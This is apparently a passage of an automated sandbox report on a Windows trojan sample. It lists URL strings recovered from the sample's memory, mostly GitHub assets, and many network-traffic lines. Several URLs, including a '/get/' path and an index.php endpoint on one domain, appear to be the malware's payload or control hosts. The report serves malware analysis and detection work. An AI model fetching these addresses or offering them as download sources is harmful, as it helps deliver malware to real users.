                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark_high_contrast-ea7373db06c8.css
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark_tritanopia-9b32204967c6.css
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/element-registry-58eba3853ad3.js
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/environment-4ff0d843ea45.js
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/github-8eaab228448a.css
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/github-elements-91586b615d25.js
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/global-05ed4a7e07b5.css
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/keyboard-shortcuts-dialog-9b7386ec0bee.js
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/light-0eace2597ca3.css
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/light_colorblind-af6c685139ba.css
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/light_high_contrast-578cdbc8a5a9.css
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/light_tritanopia-5cb699a7e247.css
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/notifications-global-99d196517b1b.js
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/pinned-octocat-093da3e6fa40.svg
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/primer-08e422afeb43.css
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/primer-primitives-2ef2a46b27ee.css
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/react-code-view-86acfaa21c17.js
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/react-lib-1fbfc5be2c18.js
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/repository-6247ca238fd4.css
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/sessions-1164ee5f3e37.js
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/ui_packages_commit-attribution_index_ts-ui_packages_commit-ch
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/ui_packages_failbot_failbot_ts-afaa9a250f2e.js
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/ui_packages_paths_index_ts-6ac43f859e31.js
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/ui_packages_react-core_register-app_ts-f7fc9821bc0f.js
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/ui_packages_ref-selector_RefSelector_tsx-858bb94813b1.js
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-72c9fbde5ad4.js
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modu
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-6890e890956f.js
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_module
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_inde
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_j
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_hotkey_dist_index_js-node_modules
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_hydro-analytics-client_dist_analy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_mo
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-c9
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-5b376145beff.js
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-5bff297a06
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_scroll-into-vi
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_octicons-react_dist_index_esm_js-
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionMenu_ActionMe
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Avatar_Avatar_js-no
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-ebfceb11
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Button_Button_js-05
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Button_IconButton_j
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ConfirmationDialog_
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Dialog_js-node_modu
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_FormControl_FormCon
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Overlay_Overlay_js-
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_PageLayout_PageLayo
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Text_Text_js-node_m
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_TreeView_TreeView_j
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_react-router-dom_dist_index_js-3b41341d5
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parse
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/wp-runtime-8cabb5e16f8b.js
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/favicons/favicon.png
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/favicons/favicon.svg
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://heygirlisheeverythingyouwantedinaman.com
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB0C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://heygirlisheeverythingyouwantedinaman.com/
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7664000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C91CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://heygirlisheeverythingyouwantedinaman.com/get/65d873db374a1e1
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://heygirlisheeverythingyouwantedinaman.com/get/65d873db374a1e176528e54b
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8F1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://heygirlisheeverythingyouwantedinaman.com:443
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7EE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://heygirlisheeverythingyouwantedinaman.com:443/index.php
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA781000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC1A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ktxcomay.com.vn
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://opengraph.githubassets.com/d510eef56fcf493b530c4a642192e5f13277b0cfc3a3219696e7493197a5e205/
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://partner.github.com/
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pki.goog/repository/0
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6EF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://repository.gij.edu.gh
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://resources.github.com/
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://resources.github.com/devops/fundamentals/devsecops/
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://resources.github.com/learn/pathways/
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://skills.github.com/
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6397000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.github.com?tags=dotcom-footer
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://user-images.githubusercontent.com/
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D6397000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.githubstatus.com/
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.torproject.org/documentation.html
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51465 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55195 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55507
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55558 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53589 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53600 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51471 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52594
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53602
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55465
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51424
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51787
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51421
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53600
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55467
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52599
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53142 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55195
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50305 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52599 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52052 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53218
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51838
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55584 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51839
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51793
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54911 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55203 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55467 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52105 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51791
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50723 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51418 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55510
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51796
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55512
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53182
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55761
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54118 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55552 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55510 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53134 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54731 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53182 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51844
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53602 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54922 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51841 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53140 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51841
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51842
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52588 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53589
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52896
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54091 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50291 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53231
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53594
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51424 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54086 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53137 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54732 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54726 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54726
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55205 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54729
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53233
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55411
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53231 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50294 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55850 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52896 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50306 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55101 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54918 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51417 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52053 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52592 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51463
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53246
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55427
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54729 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50783 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51465
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55552
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51470
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51471
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55201 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55465 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50309 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51787 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55507 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50306
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51844 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50305
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51791 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54921 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50307
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50309
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50780
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55557
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55558
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53134
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50786 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51470 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54108
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50783
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50786
